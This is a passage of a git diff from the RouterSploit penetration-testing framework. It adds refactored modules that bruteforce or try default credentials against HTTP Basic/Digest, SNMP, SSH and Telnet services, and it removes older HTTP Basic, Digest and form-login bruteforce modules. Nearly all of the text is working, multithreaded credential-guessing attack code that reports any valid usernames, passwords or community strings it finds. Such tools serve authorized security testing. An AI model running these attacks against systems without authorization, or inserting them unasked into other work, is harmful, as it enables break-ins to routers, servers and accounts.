Auth".format(self.path), verbose=self.verbosity) + return False + + if "Basic" in response.headers["WWW-Authenticate"]: + print_status("Target exposes resource {} protected by Basic Auth".format(self.path), verbose=self.verbosity) + self.auth_type = "basic" + return True + elif "Digest" in response.headers["WWW-Authenticate"]: + print_status("Target exposes resource {} protected by Digest Auth".format(self.path), verbose=self.verbosity) + self.auth_type = "digest" + return True + + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + data = LockedIterator(itertools.product(self.usernames, self.passwords)) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/generic/http_basic_digest_default.py b/routersploit/modules/creds/generic/http_basic_digest_default.py new file mode 100644 index 000000000..3ae5abce0 --- /dev/null +++ b/routersploit/modules/creds/generic/http_basic_digest_default.py @@ -0,0 +1,117 @@ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient +from routersploit.resources import wordlists +from requests.auth import HTTPDigestAuth + + +class Exploit(HTTPClient): + __info__ = { + "name": "HTTP Basic/Digest Default Creds", + "description": "Module performs dictionary attack with default credentials against HTTP Basic/Digest Auth service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + "Alexander Yakovlev ", # upgrading to perform bruteforce attack against HTTP Digest Auth service + ) + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(80, "Target HTTP port") + + threads = OptInteger(8, "Number of threads") + + defaults = OptWordlist(wordlists.defaults, "User:Pass or file with default credentials (file://)") + + path = OptString("/", "URL Path") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.credentials = [] + self.auth_type = None + + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting default creds attack against {}".format(self.path)) + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, data): + while running.is_set(): + try: + username, password = data.next().split(":") + + if self.auth_type == "digest": + auth = HTTPDigestAuth(username, password) + else: + auth = (username, password) + + response = self.http_request( + method="GET", + path=self.path, + auth=auth, + ) + + if response is not None and response.status_code != 401: + if self.stop_on_success: + running.clear() + + print_success("Authentication Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + + else: + print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + + except StopIteration: + break + + def check(self): + response = self.http_request( + method="GET", + path=self.path + ) + + if response is None: + return False + + if response.status_code != 401 or "WWW-Authenticate" not in response.headers.keys(): + print_error("Resource {} is not protected by Basic/Digest Auth".format(self.path), verbose=self.verbosity) + return False + + if "Basic" in response.headers["WWW-Authenticate"]: + print_status("Target exposes resource {} protected by Basic Auth".format(self.path), verbose=self.verbosity) + self.auth_type = "basic" + return True + elif "Digest" in response.headers["WWW-Authenticate"]: + print_status("Target exposes resource {} protected by Digest Auth".format(self.path), verbose=self.verbosity) + self.auth_type = "digest" + return True + + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/generic/snmp_bruteforce.py b/routersploit/modules/creds/generic/snmp_bruteforce.py new file mode 100644 index 000000000..5e52746a4 --- /dev/null +++ b/routersploit/modules/creds/generic/snmp_bruteforce.py @@ -0,0 +1,64 @@ +from routersploit.core.exploit import * +from routersploit.core.snmp.snmp_client import SNMPClient +from routersploit.resources import wordlists + + +class Exploit(SNMPClient): + __info__ = { + "name": "SNMP Bruteforce", + "description": "Module performs bruteforce attack against SNMP service. " + "If valid community string is found, it is displayed to the user", + "authors": ( + "Marcin Bury ", # routersploit module + ) + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(161, "Target SNMP port") + + version = OptInteger(1, "SNMP version 0:v1, 1:v2c") + threads = OptInteger(8, "Number of threads") + + defaults = OptWordlist(wordlists.snmp, "SNMP community string or file with default communit stryings (file://)") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.strings = [] + self.attack() + + @multi + def attack(self): + print_status("Starting bruteforce against SNMP service") + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if len(self.strings): + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Community String") + print_table(headers, *self.strings) + else: + print_error("Valid community strings not found") + + def target_function(self, running, data): + while running.is_set(): + try: + community_string = data.next() + + if self.snmp_get(community_string, "1.3.6.1.2.1.1.1.0", version=self.version): + if self.stop_on_success: + running.clear() + + self.strings.append((self.target, self.port, self.target_protocol, community_string)) + + except StopIteration: + break + + def check(self): + raise NotImplementedError("Check method is not available") + + @mute + def check_default(self): + return None diff --git a/routersploit/modules/creds/generic/ssh_bruteforce.py b/routersploit/modules/creds/generic/ssh_bruteforce.py new file mode 100644 index 000000000..bc1251a27 --- /dev/null +++ b/routersploit/modules/creds/generic/ssh_bruteforce.py @@ -0,0 +1,83 @@ +import itertools +from routersploit.core.exploit import * +from routersploit.core.ssh.ssh_client import SSHClient +from routersploit.resources import wordlists + + +class Exploit(SSHClient): + __info__ = { + "name": "SSH Bruteforce", + "description": "Module performs bruteforce attack against SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(8, "Number of threads") + + usernames = OptWordlist("admin", "Username or file with usernames (file://)") + passwords = OptWordlist(wordlists.passwords, "Password or file with passwords (file://)") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting bruteforce attack against SSH service") + + data = LockedIterator(itertools.product(self.usernames, self.passwords)) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, data): + while running.is_set(): + try: + username, password = data.next() + ssh = self.ssh_login(username, password) + if ssh: + if self.stop_on_success: + running.clear() + + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + ssh.close() + + except StopIteration: + break + + def check(self): + if self.ssh_test_connect(): + print_status("Target exposes SSH service", verbose=self.verbosity) + return True + + print_status("Target does not expose SSH", verbose=self.verbosity) + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + data = LockedIterator(itertools.product(self.usernames, self.passwords)) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/generic/ssh_default.py b/routersploit/modules/creds/generic/ssh_default.py new file mode 100644 index 000000000..208c3489f --- /dev/null +++ b/routersploit/modules/creds/generic/ssh_default.py @@ -0,0 +1,81 @@ +from routersploit.core.exploit import * +from routersploit.core.ssh.ssh_client import SSHClient +from routersploit.resources import wordlists + + +class Exploit(SSHClient): + __info__ = { + "name": "SSH Default Creds", + "description": "Module performs bruteforce attack against SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(8, "Number of threads") + + defaults = OptWordlist(wordlists.defaults, "User:Pass or file with default credentials (file://)") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting default credentials attack against SSH service") + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, data): + while running.is_set(): + try: + username, password = data.next().split(":") + ssh = self.ssh_login(username, password) + if ssh: + if self.stop_on_success: + running.clear() + + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + ssh.close() + + except StopIteration: + break + + def check(self): + if self.ssh_test_connect(): + print_status("Target exposes SSH service", verbose=self.verbosity) + return True + + print_status("Target does not expose SSH", verbose=self.verbosity) + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/generic/telnet_bruteforce.py b/routersploit/modules/creds/generic/telnet_bruteforce.py new file mode 100644 index 000000000..54294e7ed --- /dev/null +++ b/routersploit/modules/creds/generic/telnet_bruteforce.py @@ -0,0 +1,83 @@ +import itertools +from routersploit.core.exploit import * +from routersploit.core.telnet.telnet_client import TelnetClient +from routersploit.resources import wordlists + + +class Exploit(TelnetClient): + __info__ = { + "name": "Telnet Bruteforce", + "description": "Module performs bruteforce attack against Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(8, "Number of threads") + + usernames = OptWordlist("admin", "Username or file with usernames (file://)") + passwords = OptWordlist(wordlists.passwords, "Password or file with passwords (file://)") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting bruteforce attack against Telnet service") + + data = LockedIterator(itertools.product(self.usernames, self.passwords)) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, data): + while running.is_set(): + try: + username, password = data.next() + telnet = self.telnet_login(username, password, retries=3) + if telnet: + if self.stop_on_success: + running.clear() + + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + telnet.close() + + except StopIteration: + break + + def check(self): + if self.telnet_test_connect(): + print_status("Target exposes Telnet service", verbose=self.verbosity) + return True + + print_status("Target does not expose Telnet service", verbose=self.verbosity) + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + data = LockedIterator(itertools.product(self.usernames, self.passwords)) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/generic/telnet_default.py b/routersploit/modules/creds/generic/telnet_default.py new file mode 100644 index 000000000..042816b04 --- /dev/null +++ b/routersploit/modules/creds/generic/telnet_default.py @@ -0,0 +1,81 @@ +from routersploit.core.exploit import * +from routersploit.core.telnet.telnet_client import TelnetClient +from routersploit.resources import wordlists + + +class Exploit(TelnetClient): + __info__ = { + "name": "Telnet Default Creds", + "description": "Module performs dictionary attack with default credentials against Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(8, "Number of threads") + + defaults = OptWordlist(wordlists.defaults, "User:Pass or file with default credentials (file://)") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting default credentials attack against Telnet service") + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, data): + while running.is_set(): + try: + username, password = data.next().split(":") + telnet = self.telnet_login(username, password, retries=3) + if telnet: + if self.stop_on_success: + running.clear() + + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + telnet.close() + + except StopIteration: + break + + def check(self): + if self.telnet_test_connect(): + print_status("Target exposes Telnet service", verbose=self.verbosity) + return True + + print_status("Target does not expose Telnet service", verbose=self.verbosity) + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/http_basic_bruteforce.py b/routersploit/modules/creds/http_basic_bruteforce.py deleted file mode 100644 index 3f4a4a5e0..000000000 --- a/routersploit/modules/creds/http_basic_bruteforce.py +++ /dev/null @@ -1,103 +0,0 @@ -import threading -import itertools - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - print_success, - print_table, - http_request, - multi, - threads, - validators, -) - -from routersploit.exceptions import StopThreadPoolExecutor - - -class Exploit(exploits.Exploit): - """ - Module performs bruteforce attack against HTTP Basic Auth service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'HTTP Basic Bruteforce', - 'description': 'Module performs bruteforce attack against HTTP Basic Auth service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(80, 'Target port') - - threads = exploits.Option(8, 'Numbers of threads') - usernames = exploits.Option('admin', 'Username or file with usernames (file://)') - passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)') - path = exploits.Option('/', 'URL Path') - verbosity = exploits.Option(True, 'Display authentication attempts', validators=validators.boolify) - stop_on_success = exploits.Option(True, 'Stop on first valid authentication attempt', validators=validators.boolify) - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - url = "{}:{}{}".format(self.target, self.port, self.path) - - response = http_request(method="GET", url=url) - if response is None: - return - - if response.status_code != 401: - print_status("Target is not protected by Basic Auth") - return - - if self.usernames.startswith('file://'): - usernames = open(self.usernames[7:], 'r') - else: - usernames = [self.usernames] - - if self.passwords.startswith('file://'): - passwords = open(self.passwords[7:], 'r') - else: - passwords = [self.passwords] - - collection = itertools.product(usernames, passwords) - - with threads.ThreadPoolExecutor(self.threads) as executor: - for record in collection: - executor.submit(self.target_function, url, record) - - if self.credentials: - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def target_function(self, url, creds): - name = threading.current_thread().name - user, password = creds - user = user.encode('utf-8').strip() - password = password.encode('utf-8').strip() - - response = http_request(method="GET", url=url, auth=(user, password)) - - if response is not None and response.status_code != 401: - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity) - self.credentials.append((self.target, self.port, user, password)) - if self.stop_on_success: - raise StopThreadPoolExecutor - else: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity) diff --git a/routersploit/modules/creds/http_basic_default.py b/routersploit/modules/creds/http_basic_default.py deleted file mode 100644 index e6432ab32..000000000 --- a/routersploit/modules/creds/http_basic_default.py +++ /dev/null @@ -1,98 +0,0 @@ -import threading - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - print_success, - print_table, - http_request, - multi, - validators, -) - -from routersploit.exceptions import StopThreadPoolExecutor -from routersploit.threads import ThreadPoolExecutor - - -class Exploit(exploits.Exploit): - """ - Module perform dictionary attack with default credentials against HTTP Basic Auth service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'HTTP Basic Default Creds', - 'description': 'Module perform dictionary attack with default credentials against HTTP Basic Auth service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(80, 'Target port') - threads = exploits.Option(8, 'Number of threads') - defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)') - path = exploits.Option('/', 'URL Path') - verbosity = exploits.Option(True, 'Display authentication attempts', validators=validators.boolify) - stop_on_success = exploits.Option(True, 'Stop on first valid authentication attempt', validators=validators.boolify) - - credentials = [] - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - url = "{}:{}{}".format(self.target, self.port, self.path) - - response = http_request("GET", url) - if response is None: - return - - if response.status_code != 401: - print_status("Target is not protected by Basic Auth") - return - - if self.defaults.startswith('file://'): - defaults = open(self.defaults[7:], 'r') - else: - defaults = [self.defaults] - - with ThreadPoolExecutor(self.threads) as executor: - for record in defaults: - username, password = record.split(':') - executor.submit(self.target_function, url, username, password) - - if self.credentials: - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - defaults.close() - - def target_function(self, url, user, password): - name = threading.current_thread().name - - user = user.encode('utf-8').strip() - password = password.encode('utf-8').strip() - - response = http_request(method="GET", url=url, auth=(user, password)) - - if response is not None and response.status_code != 401: - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity) - self.credentials.append((self.target, self.port, user, password)) - if self.stop_on_success: - raise StopThreadPoolExecutor - else: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity) diff --git a/routersploit/modules/creds/http_digest_bruteforce.py b/routersploit/modules/creds/http_digest_bruteforce.py deleted file mode 100644 index aafbeea6e..000000000 --- a/routersploit/modules/creds/http_digest_bruteforce.py +++ /dev/null @@ -1,105 +0,0 @@ -import threading -import itertools - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - print_success, - print_table, - http_request, - multi, - threads, - validators, -) - -from routersploit.exceptions import StopThreadPoolExecutor -from requests.auth import HTTPDigestAuth - - -class Exploit(exploits.Exploit): - """ - Module performs bruteforce attack against HTTP Digest Auth service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'HTTP Digest Bruteforce', - 'description': 'Module performs bruteforce attack against HTTP Digest Auth service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit HTTP Basic Auth module - 'Alexander Yakovlev ', # upgrading to perform bruteforce attack against HTTP Digest Auth service - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(80, 'Target port') - - threads = exploits.Option(8, 'Numbers of threads') - usernames = exploits.Option('admin', 'Username or file with usernames (file://)') - passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)') - path = exploits.Option('/', 'URL Path') - verbosity = exploits.Option(True, 'Display authentication attempts', validators=validators.boolify) - stop_on_success = exploits.Option(True, 'Stop on first valid authentication attempt', validators=validators.boolify) - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - url = "{}:{}{}".format(self.target, self.port, self.path) - - response = http_request(method="GET", url=url) - if response is None: - return - - if response.status_code != 401: - print_status("Target is not protected by Digest Auth") - return - - if self.usernames.startswith('file://'): - usernames = open(self.usernames[7:], 'r') - else: - usernames = [self.usernames] - - if self.passwords.startswith('file://'): - passwords = open(self.passwords[7:], 'r') - else: - passwords = [self.passwords] - - collection = itertools.product(usernames, passwords) - - with threads.ThreadPoolExecutor(self.threads) as executor: - for record in collection: - executor.submit(self.target_function, url, record) - - if self.credentials: - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def target_function(self, url, creds): - name = threading.current_thread().name - user, password = creds - user = user.encode('utf-8').strip() - password = password.encode('utf-8').strip() - - response = http_request(method="GET", url=url, auth=HTTPDigestAuth(user, password)) - - if response is not None and response.status_code != 401: - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity) - self.credentials.append((self.target, self.port, user, password)) - if self.stop_on_success: - raise StopThreadPoolExecutor - else: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity) diff --git a/routersploit/modules/creds/http_digest_default.py b/routersploit/modules/creds/http_digest_default.py deleted file mode 100644 index 99a4669f0..000000000 --- a/routersploit/modules/creds/http_digest_default.py +++ /dev/null @@ -1,100 +0,0 @@ -import threading - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - print_success, - print_table, - http_request, - multi, - validators, -) - -from routersploit.exceptions import StopThreadPoolExecutor -from routersploit.threads import ThreadPoolExecutor -from requests.auth import HTTPDigestAuth - - -class Exploit(exploits.Exploit): - """ - Module perform dictionary attack with default credentials against HTTP Digest Auth service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'HTTP Digest Default Creds', - 'description': 'Module perform dictionary attack with default credentials against HTTP Digest Auth service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit Http Basic auth module - 'Alexander Yakovlev ', # upgrading to perform bruteforce attack against HTTP Digest Auth service - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(80, 'Target port') - threads = exploits.Option(8, 'Number of threads') - defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)') - path = exploits.Option('/', 'URL Path') - verbosity = exploits.Option(True, 'Display authentication attempts', validators=validators.boolify) - stop_on_success = exploits.Option(True, 'Stop on first valid authentication attempt', validators=validators.boolify) - - credentials = [] - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - url = "{}:{}{}".format(self.target, self.port, self.path) - - response = http_request("GET", url) - if response is None: - return - - if response.status_code != 401: - print_status("Target is not protected by Digest Auth") - return - - if self.defaults.startswith('file://'): - defaults = open(self.defaults[7:], 'r') - else: - defaults = [self.defaults] - - with ThreadPoolExecutor(self.threads) as executor: - for record in defaults: - username, password = record.split(':') - executor.submit(self.target_function, url, username, password) - - if self.credentials: - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - defaults.close() - - def target_function(self, url, user, password): - name = threading.current_thread().name - - user = user.encode('utf-8').strip() - password = password.encode('utf-8').strip() - - response = http_request(method="GET", url=url, auth=HTTPDigestAuth(user, password)) - - if response is not None and response.status_code != 401: - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity) - self.credentials.append((self.target, self.port, user, password)) - if self.stop_on_success: - raise StopThreadPoolExecutor - else: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity) diff --git a/routersploit/modules/creds/http_form_bruteforce.py b/routersploit/modules/creds/http_form_bruteforce.py deleted file mode 100644 index aa4c2857b..000000000 --- a/routersploit/modules/creds/http_form_bruteforce.py +++ /dev/null @@ -1,218 +0,0 @@ -import threading -import requests -import itertools -from bs4 import BeautifulSoup - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - sanitize_url, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module performs bruteforce attack against HTTP form service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'HTTP Form Bruteforce', - 'description': 'Module performs bruteforce attack against HTTP form service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(80, 'Target port') - threads = exploits.Option(8, 'Number of threads') - usernames = exploits.Option('admin', 'Username or file with usernames (file://)') - passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)') - form = exploits.Option('auto', 'Post Data: auto or in form login={{USER}}&password={{PASS}}&submit') - path = exploits.Option('/login.php', 'URL Path') - form_path = exploits.Option('same', 'same as path or URL Form Path') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') - - credentials = [] - data = "" - invalid = {"min": 0, "max": 0} - - def run(self): - self.credentials = [] - self.attack() - - def get_form_path(self): - if self.form_path == 'same': - return self.path - else: - return self.form_path - - @multi - def attack(self): - url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) - - try: - requests.get(url, verify=False) - except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): - print_error("Invalid URL format: %s" % url) - return - except requests.exceptions.ConnectionError: - print_error("Connection error: %s" % url) - return - - # authentication type - if self.form == 'auto': - form_data = self.detect_form() - - if form_data is None: - print_error("Could not detect form") - return - - (form_action, self.data) = form_data - if form_action: - self.path = form_action - else: - self.data = self.form - - print_status("Using following data: ", self.data) - - # invalid authentication - self.invalid_auth() - - # running threads - if self.usernames.startswith('file://'): - usernames = open(self.usernames[7:], 'r') - else: - usernames = [self.usernames] - - if self.passwords.startswith('file://'): - passwords = open(self.passwords[7:], 'r') - else: - passwords = [self.passwords] - - collection = LockedIterator(itertools.product(usernames, passwords)) - self.run_threads(self.threads, self.target_function, collection) - - if len(self.credentials): - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def invalid_auth(self): - for i in range(0, 21, 5): - url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} - - user = "A" * i - password = "A" * i - - postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) - r = requests.post(url, headers=headers, data=postdata, verify=False) - length = len(r.text) - - if i == 0: - self.invalid = {"min": length, "max": length} - - if length < self.invalid["min"]: - self.invalid["min"] = length - elif length > self.invalid["max"]: - self.invalid["max"] = length - - def detect_form(self): - url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) - r = requests.get(url, verify=False) - soup = BeautifulSoup(r.text, "lxml") - - forms = soup.findAll("form") - - if forms is None: - return None - - res = [] - action = None - user_name_list = ["username", "user", "user_name", "login", "username_login", "nameinput", "uname", "__auth_user", "txt_user", "txtusername"] - password_list = ["password", "pass", "password_login", "pwd", "passwd", "__auth_pass", "txt_pwd", "txtpwd"] - found = False - - for form in forms: - tmp = [] - - if not len(form): - continue - - action = form.attrs.get('action', None) - if action and not action.startswith("/"): - action = "/" + action - - for inp in form.findAll("input"): - attributes = ["name", "id"] - - for atr in attributes: - if atr not in inp.attrs.keys(): - continue - - if inp.attrs[atr].lower() in user_name_list and inp.attrs['type'] != "hidden": - found = True - tmp.append(inp.attrs[atr] + "=" + "{{USER}}") - elif inp.attrs[atr].lower() in password_list and inp.attrs['type'] != "hidden": - found = True - tmp.append(inp.attrs[atr] + "=" + "{{PASS}}") - else: - if 'value' in inp.attrs.keys(): - tmp.append(inp.attrs[atr] + "=" + inp.attrs['value']) - elif inp.attrs['type'] not in ("submit", "button"): - tmp.append(inp.attrs[atr] + "=") - - if found: - res = tmp - - res = list(set(res)) - return (action, '&'.join(res)) - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} - - print_status(name, 'process is starting...', verbose=module_verbosity) - - while running.is_set(): - try: - user, password = data.next() - user = user.strip() - password = password.strip() - - postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) - r = requests.post(url, headers=headers, data=postdata, verify=False) - length = len(r.text) - - if length < self.invalid["min"] or length > self.invalid["max"]: - if boolify(self.stop_on_success): - running.clear() - - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - self.credentials.append((self.target, self.port, user, password)) - else: - print_error(name, "Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - except StopIteration: - break - - print_status(name, 'process is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/creds/http_form_default.py b/routersploit/modules/creds/http_form_default.py deleted file mode 100644 index 45488ca2e..000000000 --- a/routersploit/modules/creds/http_form_default.py +++ /dev/null @@ -1,212 +0,0 @@ -import threading -import requests -from bs4 import BeautifulSoup - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - sanitize_url, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module performs dictionary attack with default credentials against HTTP form service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'HTTP Form Default Creds', - 'description': 'Module performs dictionary attack with default credentials against HTTP form service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(80, 'Target port') - threads = exploits.Option(8, 'Number of threads') - defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)') - form = exploits.Option('auto', 'Post Data: auto or in form login={{USER}}&password={{PASS}}&submit') - path = exploits.Option('/login.php', 'URL 